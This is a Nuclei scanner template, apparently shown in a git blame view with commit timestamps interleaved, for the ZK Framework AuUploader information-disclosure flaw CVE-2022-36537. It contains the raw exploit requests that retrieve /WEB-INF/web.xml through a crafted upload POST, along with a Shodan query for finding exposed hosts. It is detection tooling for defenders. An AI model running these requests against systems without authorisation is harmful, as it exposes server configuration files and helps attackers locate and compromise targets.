2023-01-14 15:28:35 +00:00
id : CVE-2022-36537
info :
2023-02-03 17:39:21 +00:00
name : ZK Framework - Information Disclosure
2023-01-14 15:28:35 +00:00
author : theamanrawat
severity : high
description : |
2023-02-03 17:39:21 +00:00
ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
2023-01-14 15:28:35 +00:00
reference :
- https://github.com/Malwareman007/CVE-2022-36537/
2023-01-18 06:44:52 +00:00
- https://tracker.zkoss.org/browse/ZK-5150
2023-02-03 17:39:21 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-36537
2023-07-11 19:49:27 +00:00
- https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-zk-java-framework-rce-flaw/
2023-01-14 15:28:35 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2022-36537
cwe-id : CWE-200
2023-07-11 19:49:27 +00:00
epss-score : 0.96509
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:*
2023-01-14 15:28:35 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-01-14 15:28:35 +00:00
shodan-query : http.title:"Server backup manager"
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : zkoss
product : zk_framework
tags : cve,cve2022,zk-framework,exposure,unauth,kev,intrusive
2023-01-14 15:28:35 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-01-14 15:28:35 +00:00
- raw :
- |
GET /login.zul HTTP/1.1
Host : {{Hostname}}
- |
POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1
Host : {{Hostname}}
Accept-Encoding : gzip, deflate
Accept : */*
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp
Content-Length : 154
------WebKitFormBoundaryCs6yB0zvpfSBbYEp
Content-Disposition : form-data; name="nextURI"
/WEB-INF/web.xml
------WebKitFormBoundaryCs6yB0zvpfSBbYEp--
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2023-01-14 15:28:35 +00:00
matchers-condition : and
matchers :
2023-01-15 19:09:02 +00:00
- type : regex
part : body
regex :
2023-07-11 19:49:27 +00:00
- <display-name>.*</display-name>
- |-
<welcome-file-list>((.|
)*)welcome-file-list>
- xml version
- web-app
2023-01-14 15:28:35 +00:00
condition : and
- type : status
status :
- 200
extractors :
- type : regex
name : dtid
group : 1
regex :
- "dt:'(.*?)',cu:"
internal : true